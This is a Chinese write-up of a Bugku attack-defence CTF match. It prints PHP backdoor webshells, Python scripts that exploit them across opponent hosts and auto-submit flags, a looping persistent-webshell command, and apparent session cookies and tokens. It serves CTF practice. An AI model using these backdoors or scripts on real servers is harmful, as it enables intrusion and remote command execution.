7.10bugkuawd

这次我们拿了第二

防御阶段

服务器先连xshell,2222端口

然后把web目录整个dump下来

1

tar -cvf web.tar /var/www/html

或者

1

zip -q -r web.zip /var/www/html

备份到其他位置

1
2


mv web.tar /tmp
mv web.zip /home/xxx

数据库也要备份

1

mysqldump -udb_user -p db_passwd databasename > bak.sql

xftp下载到本地，然后开D盾扫描

然后修改config.php,upload.php和下面那个1.php

upload.php原来是这样

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


<?php
$uploaddir = 'uploads/'; 
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)){
 echo "File is valid, and was successfully uploaded.\n";
} 
else {
 echo "File uploading failed.\n";
}
?>

我们白名单过滤

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


<?php
$uploaddir = 'uploads/'; 
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (preg_match("/png|jpg|jpeg|gif/is",(substr($_FILES["userfile"]["name"],strrpos($_FILES["userfile"]["name"], '.')+1))))
{
    #success
}
else{
    die();
}
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)){

 echo "File is valid, and was successfully uploaded.\n";
} 
else {
 echo "File uploading failed.\n";
}
?>

然后config.php这里

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


<?php
/**
 * Created by : PhpStorm
 * User: Aman
 * 我是一匹狼，仰望着星空却找不到月亮
 * Date: 2021-02-22 17:05
 */


$e = $_REQUEST['www'];
$arr = array($_POST['aman'] => '|.*|e',);
array_walk($arr, "preg_replace", '');

我们直接注释了，后面也是靠这个洞拿分

然后俩个1.php

1

<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

一模一样的，直接注释

pwn就交给xixi师傅加固了

攻击阶段

第一轮先扫描所有人的ip

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


import requests

def check_url(url):
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print(f"Valid URL: {url}")  # 只打印有效的URL
            return True
    except requests.exceptions.RequestException:
        pass  # 不打印任何错误信息
    return False

def main():
    base_url = "http://192-168-1-{}.pvp6199.bugku.cn"
    
    # 设置X的遍历范围（例如1-255）
    start = 1
    end = 255
    
    for x in range(start, end + 1):
        url = base_url.format(x)
        check_url(url)  # 只检查，不打印无效URL

if __name__ == "__main__":
    main()

先找找upload.html，尝试上传，结果都不行，第一轮也是没被打掉分

然后第二轮发现了很多config.php没加固的

直接post传参

1

aman=system('cat /flag')&www=

然后接下来就是跑脚本了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


import requests

urls = [
    "http://192-168-1-19.pvp6199.bugku.cn",
    "http://192-168-1-64.pvp6199.bugku.cn",
    "http://192-168-1-75.pvp6199.bugku.cn",
    "http://192-168-1-94.pvp6199.bugku.cn",
    "http://192-168-1-95.pvp6199.bugku.cn",
    "http://192-168-1-119.pvp6199.bugku.cn",
    "http://192-168-1-128.pvp6199.bugku.cn",
    "http://192-168-1-133.pvp6199.bugku.cn",
    "http://192-168-1-148.pvp6199.bugku.cn",
    "http://192-168-1-154.pvp6199.bugku.cn",
    "http://192-168-1-175.pvp6199.bugku.cn",
    "http://192-168-1-188.pvp6199.bugku.cn",
    "http://192-168-1-212.pvp6199.bugku.cn",
    "http://192-168-1-246.pvp6199.bugku.cn",
    "http://192-168-1-250.pvp6199.bugku.cn",
]

path = "/admin/config.php"

# POST 数据
data = {
    "aman": 'system("cat /flag")',
    "www": ""
}

# 遍历所有 URL
for base_url in urls:
    url = base_url + path
    try:
        resp = requests.post(url, data=data, timeout=5)
        if "flag" in resp.text.lower():  # 检查响应中是否包含flag关键字(不区分大小写)
            print(f"==== 发现flag在 {url} ====")
            print(resp.text.strip())
            print("\n" + "="*50 + "\n")
    except Exception as e:
        print(f"[!] {url} 请求失败: {e}")

后面想到可以自动提交,bp抓包后直接自动提交

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86


import requests

# 目标URL列表
urls = [
    "http://192-168-1-19.pvp6199.bugku.cn",
    "http://192-168-1-64.pvp6199.bugku.cn",
    "http://192-168-1-75.pvp6199.bugku.cn",
    "http://192-168-1-94.pvp6199.bugku.cn",
    "http://192-168-1-95.pvp6199.bugku.cn",
    "http://192-168-1-119.pvp6199.bugku.cn",
    "http://192-168-1-128.pvp6199.bugku.cn",
    "http://192-168-1-133.pvp6199.bugku.cn",
    "http://192-168-1-148.pvp6199.bugku.cn",
    "http://192-168-1-154.pvp6199.bugku.cn",
    "http://192-168-1-175.pvp6199.bugku.cn",
    "http://192-168-1-188.pvp6199.bugku.cn",
    "http://192-168-1-212.pvp6199.bugku.cn",
    "http://192-168-1-246.pvp6199.bugku.cn",
    "http://192-168-1-250.pvp6199.bugku.cn",
]

path = "/admin/config.php"

# 命令执行POST数据
data = {
    "aman": 'system("cat /flag")',
    "www": ""
}

# 提交flag的配置
submit_url = "https://ctf.bugku.com/pvp/submit.html"
submit_headers = {
    "Host": "ctf.bugku.com",
    "Cookie": "Hm_lvt_97426e6b69219bfb34f8a3a1058dc596=1752064959,1752144678; X-CSRF-TOKEN=5f862444be2abe635553431f5dbe3cc7; PHPSESSID=510da7c779ed3187e1e367298ca84438; autoLogin=kdoN64ND3Xo2hQQsxG98rnS9Z0dSe7yDQ6%2BPQQyFxJceBfhGi2cTEn2DEIn1%2BnAp90bvuC2oPvmUmZ8JberY0rkxG1ceHHz4Dg0bWvElwk4efWo1ot0DhQ3sP0GP%2BkzkXBEteb0agHTh8g; Hm_lpvt_97426e6b69219bfb34f8a3a1058dc596=1752150215; HMACCOUNT=BF67DCC11FFB9723",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Csrf-Token": "5f862444be2abe635553431f5dbe3cc7",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://ctf.bugku.com",
    "Referer": "https://ctf.bugku.com/pvp/match/id/6199.html",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Priority": "u=0",
    "Te": "trailers"
}
submit_data = {
    "id": "6199",
    "token": "b34932d2ac71a030ae821a648f2e535b"
}

# 遍历所有URL
for base_url in urls:
    url = base_url + path
    try:
        # 尝试执行命令获取flag
        resp = requests.post(url, data=data, timeout=5)
        if "flag" in resp.text.lower():
            flag = resp.text.strip()
            print(f"==== 发现flag在 {url} ====")
            print(flag)
            
            # 提取flag内容（假设格式为flag{...}）
            if "flag{" in flag and "}" in flag:
                flag_content = flag[flag.index("flag{"):flag.index("}")+1]
                submit_data["flag"] = flag_content
                
                # 提交flag
                try:
                    submit_resp = requests.post(
                        submit_url,
                        headers=submit_headers,
                        data=submit_data,
                        timeout=5
                    )
                    print("\n=== 提交结果 ===")
                    print(submit_resp.text)
                except Exception as submit_e:
                    print(f"[!] 提交flag失败: {submit_e}")
            
            print("\n" + "="*50 + "\n")
    except Exception as e:
        print(f"[!] {url} 请求失败: {e}")

但是发现有部分队伍修复了这个漏洞，换1.php那个试试

1

/admin/img/editor/2x/1.php?s=system('cat /flag')

发现绝大多数队伍都没修复,自动化延时提交脚本

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100


import requests
import time
from datetime import datetime

# 目标URL列表
urls = [
    "http://192-168-1-19.pvp6199.bugku.cn",
    "http://192-168-1-64.pvp6199.bugku.cn",
    "http://192-168-1-75.pvp6199.bugku.cn",
    "http://192-168-1-94.pvp6199.bugku.cn",
    "http://192-168-1-95.pvp6199.bugku.cn",
    "http://192-168-1-119.pvp6199.bugku.cn",
    "http://192-168-1-128.pvp6199.bugku.cn",
    "http://192-168-1-133.pvp6199.bugku.cn",
    "http://192-168-1-148.pvp6199.bugku.cn",
    "http://192-168-1-154.pvp6199.bugku.cn",
    "http://192-168-1-175.pvp6199.bugku.cn",
    "http://192-168-1-188.pvp6199.bugku.cn",
    "http://192-168-1-212.pvp6199.bugku.cn",
    "http://192-168-1-246.pvp6199.bugku.cn",
    "http://192-168-1-250.pvp6199.bugku.cn",
]

path = "/admin/img/editor/2x/1.php?s=system('cat /flag')"

# 提交flag的配置
submit_url = "https://ctf.bugku.com/pvp/submit.html"
submit_headers = {
    "Host": "ctf.bugku.com",
    "Cookie": "Hm_lvt_97426e6b69219bfb34f8a3a1058dc596=1752064959,1752144678; X-CSRF-TOKEN=5f862444be2abe635553431f5dbe3cc7; PHPSESSID=510da7c779ed3187e1e367298ca84438; autoLogin=kdoN64ND3Xo2hQQsxG98rnS9Z0dSe7yDQ6%2BPQQyFxJceBfhGi2cTEn2DEIn1%2BnAp90bvuC2oPvmUmZ8JberY0rkxG1ceHHz4Dg0bWvElwk4efWo1ot0DhQ3sP0GP%2BkzkXBEteb0agHTh8g; Hm_lpvt_97426e6b69219bfb34f8a3a1058dc596=1752150215; HMACCOUNT=BF67DCC11FFB9723",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Csrf-Token": "5f862444be2abe635553431f5dbe3cc7",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://ctf.bugku.com",
    "Referer": "https://ctf.bugku.com/pvp/match/id/6199.html",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Priority": "u=0",
    "Te": "trailers"
}
submit_data = {
    "id": "6199",
    "token": "b34932d2ac71a030ae821a648f2e535b"
}

# 设置3分钟延迟（180秒）
DELAY = 60

def scan_and_submit():
    print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 开始新一轮扫描...")
    
    for base_url in urls:
        url = base_url + path
        try:
            # 尝试执行命令获取flag
            resp = requests.get(url, timeout=5)
            if "flag" in resp.text.lower():
                flag = resp.text.strip()
                print(f"\n==== 发现flag在 {url} ====")
                print(flag)
                
                # 提取flag内容（假设格式为flag{...}）
                if "flag{" in flag and "}" in flag:
                    flag_content = flag[flag.index("flag{"):flag.index("}")+1]
                    submit_data["flag"] = flag_content
                    
                    # 提交flag
                    try:
                        submit_resp = requests.post(
                            submit_url,
                            headers=submit_headers,
                            data=submit_data,
                            timeout=5
                        )
                        print("\n=== 提交结果 ===")
                        print(submit_resp.text)
                    except Exception as submit_e:
                        print(f"[!] 提交flag失败: {submit_e}")
                
                print("\n" + "="*50 + "\n")
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")

# 主循环
if __name__ == "__main__":
    print("脚本开始运行，将每3分钟扫描一次目标URL...")
    print("按Ctrl+C终止脚本")
    
    try:
        while True:
            scan_and_submit()
            print(f"\n[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 本轮扫描完成，等待{DELAY}秒后继续...")
            time.sleep(DELAY)
    except KeyboardInterrupt:
        print("\n脚本已终止")

打到后面几轮发现，“不爆零就是胜利”这只队伍每一轮都在攻击我们，我们都没找到哪里出问题了

接着脚本提交的flag也变少两个，说明有队伍修复了，这个时候才想起来之前应该植入不死马的，去我们已经拿下权限的机子看看进程

1

ps -aux

找到别人的一长串bash命令，而且每0.2秒延迟写入木马,也是狠狠收集下来

1
2
3
4
5
6
7
8


sh -c bash -c '{
    while true;
    do 
        echo '<?php $key=$_POST["key"];$keyhash=md5($key);if($keyhash==="5e9cd18f116f0a5031fbdb5a844f43e1") {eval($_POST["a"]);}echo"file not find."; ?>' > /app/.e10ded9685c604d63c1f800e9dfc0221.php;
        chmod 700 /app/.e10ded9685c604d63c1f800e9dfc0221.php;
        sleep 0.2;
    done;
}' | {xxd,-r,-p} | {bash,-i}

最后快要结束了查看我们机子进程

才发现被植入了二进制文件做权限维持，kill不掉进程，赛后才知道phpmyadmin有弱口令没改，被登入进去写马，然后被权限维持了